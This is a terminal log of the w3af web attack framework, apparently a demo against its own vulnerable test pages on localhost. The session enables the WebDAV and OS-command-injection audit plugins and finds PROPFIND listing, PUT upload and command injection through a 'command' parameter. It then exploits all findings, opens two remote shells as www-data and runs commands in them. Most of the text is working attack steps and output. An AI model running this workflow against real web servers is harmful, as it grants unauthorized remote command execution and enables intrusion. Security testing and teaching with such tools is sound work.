dz0@sock3t:~/w3af$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output
Enabled output plugins:
textFile
console
w3af/plugins>>> output config textFile
w3af/plugin/textFile>>> set fileName output-w3af.txt
w3af/plugin/textFile>>> set verbosity 10
w3af/plugin/textFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 0
w3af/plugin/console>>> back
w3af/plugins>>> audit dav, osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
dav
osCommanding
w3af/plugins>>> discovery serverHeader
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/dav/ ,
http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
The Server header for this HTTP server is: Apache
The URL: "http://localhost/w3af/dav/" has the following DAV methods enabled:
- COPY, DELETE, GET, HEAD, LOCK, MOVE, OPTIONS, POST, PROPFIND, PROPPATCH,
TRACE, UNLOCK
Found 2 URLs and 2 different points of injection.
The list of URLs is:
- http://localhost/w3af/dav/
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/dav/ | Method: GET
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET |
Parameters: (command)
Starting dav plugin execution.
100% [====================================================] 2/2                
Directory listing with HTTP PROPFIND method was found at directory:
http://localhost/w3af/dav/ The vulnerability was found in the request with
id 11.
File upload with HTTP PUT method was found at directory:
http://localhost/w3af/dav/ . Uploaded test file:
http://localhost/w3af/dav/FReli The vulnerability was found in the request
with id 9.
Starting osCommanding plugin execution.
100% [====================================================] 2/2                
OS Commanding was found at:
http://localhost/w3af/osCommanding/vulnerable.php . Using method: GET. The
data sent was: command=+ping+-c+6+localhost The vulnerability was found in
the request with id 15.
w3af>>> exploit
w3af/exploit>>> exploit *
Using plugin: davShell
davShell exploit plugin is starting.
Vulnerability successfully exploited. 
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to
POST for exploiting but failed.
Vulnerability successfully exploited. 
remoteFileIncludeShell plugin has to be correctly configured to use.
w3af/exploit>>> interact
This is a list of available shells:
- [0] <davShell object (ruser: "www-data" | rsystem: "Linux sock3t 2.6.15-27-686 i686 GNU/Linux")>
- [1] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux sock3t 2.6.15-27-686 i686 GNU/Linux")>
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/davShell-0>>> ls
FReli
KWqEDAS.asp
KWqEDAS.php
LwpHhnW.asp
QVXiV
afJNhMt.asp
bHjrb
fUWCo
kCYKq
nIJcKJd.asp

w3af/exploit/davShell-0>>> w
 22:12:40 up 9 days, 12:19,  4 users,  load average: 2.49, 2.50, 2.46
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
dz0      tty7     :0               02Feb08  7.00s  1:27   0.25s gnome-session
dz0      pts/0    :0.0             02Feb08  6days  0.44s 39.76s gnome-terminal
dz0      pts/1    :0.0             02Feb08  7.00s  3.70s  1.15s python ./w3af -
dz0      pts/2    :0.0             02Feb08  5:27m  0.59s  0.59s bash
w3af/exploit/davShell-0>>> endInteraction
w3af/exploit>>> interact 1
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-1>>> ls
lalal
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell-1>>> whoami
www-data
w3af/exploit/osCommandingShell-1>>> endInteraction
w3af/exploit>>> back
w3af>>> exit

spawned a remote shell today?
dz0@sock3t:~/w3af$